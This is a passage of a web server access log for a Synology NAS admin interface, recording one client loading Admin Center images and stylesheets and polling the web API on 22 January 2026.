"https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_regional_options.png?v=04eb72bb8150b539eaa581f17b303070" [Client 84.1.26.27] [Length 1043] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_external_devices.png?v=e9e296ffce8ffc133f99729a40f34ef7" [Client 84.1.26.27] [Length 577] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_synology_account.png?v=93d1433f07c5f4daa62bb4a8b24d6b57" [Client 84.1.26.27] [Length 764] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_task_scheduler.png?v=7e5642bd8b77ed774f069fbb87a7580f" [Client 84.1.26.27] [Length 698] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/category_icon/cate_icn_indexing_service.png?v=69a3e0911c1a8fa45a17ef4af148042f" [Client 84.1.26.27] [Length 787] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/modules/modules.json?v=42962&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 961] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_shared_folders.png?v=42962-s9" [Client 84.1.26.27] [Length 2086] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_domain_and_LDAP.png?v=42962-s9" [Client 84.1.26.27] [Length 1545] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_network.png?v=42962-s9" [Client 84.1.26.27] [Length 1785] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_file_services.png?v=42962-s9" [Client 84.1.26.27] [Length 1773] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_user_and_group.png?v=42962-s9" [Client 84.1.26.27] [Length 1448] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_task_scheduler.png?v=42962-s9" [Client 84.1.26.27] [Length 1472] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_external_access.png?v=42962-s9" [Client 84.1.26.27] [Length 2251] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_login_portal.png?v=42962-s9" [Client 84.1.26.27] [Length 2481] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_security.png?v=42962-s9" [Client 84.1.26.27] [Length 1837] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_regional_options.png?v=42962-s9" [Client 84.1.26.27] [Length 2841] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_external_devices.png?v=42962-s9" [Client 84.1.26.27] [Length 1470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_terminal_and_SNMP.png?v=42962-s9" [Client 84.1.26.27] [Length 1583] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_notifications.png?v=42962-s9" [Client 84.1.26.27] [Length 1257] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_update_and_restore.png?v=42962-s9" [Client 84.1.26.27] [Length 1718] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_hardware_and_power.png?v=42962-s9" [Client 84.1.26.27] [Length 1799] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_indexing_service.png?v=42962-s9" [Client 84.1.26.27] [Length 2220] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_synology_account.png?v=42962-s9" [Client 84.1.26.27] [Length 1822] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_privilege.png?v=42962-s9" [Client 84.1.26.27] [Length 1489] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_info_center.png?v=42962-s9" [Client 84.1.26.27] [Length 1732] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 66] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:51 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4325] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:55:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:00 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:01 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/fieldset_arrow.png?v=e9087ed3a24f4f1e4f30d52ce4123c82" [Client 84.1.26.27] [Length 1206] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[22/Jan/2026:12:56:01 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/svg/radio_button.svg" [Client 84.1.26.27] [Length 1226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[22/Jan/2026:12:56:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 1600] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:04 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:04 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:10 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:15 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:17 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:22 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:27 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:34 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:35 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:42 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/bt_sort.png?v=129fa0eb2975062ccdc3ac3f716bea10" [Client 84.1.26.27] [Length 414] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:56:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 9969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 698] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 1865] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:42 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/exgrid_icn_shared_folder.png?v=89dd66b87eb235a7d9eac2bdf3acd988" [Client 84.1.26.27] [Length 451] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:56:42 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/exgrid_arrow.png?v=86c199aa3683a3f7e6886f50837b8f95" [Client 84.1.26.27] [Length 862] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[22/Jan/2026:12:56:42 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/exgrid_status_compression_share.png?v=40a9a9909bed8f6e98909df75f74daab" [Client 84.1.26.27] [Length 696] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/AdminCenter/style.css?v=1661226912" +[22/Jan/2026:12:56:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:48 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_close_dark.png?v=23fa5fc465b3120356a41a0ef1d97718" [Client 84.1.26.27] [Length 629] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[22/Jan/2026:12:56:48 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/bt_information_mini.png?v=427ee9d0089241b7c40a6f9e5e2c7a4c" [Client 84.1.26.27] [Length 436] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[22/Jan/2026:12:56:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 510] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:56:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" 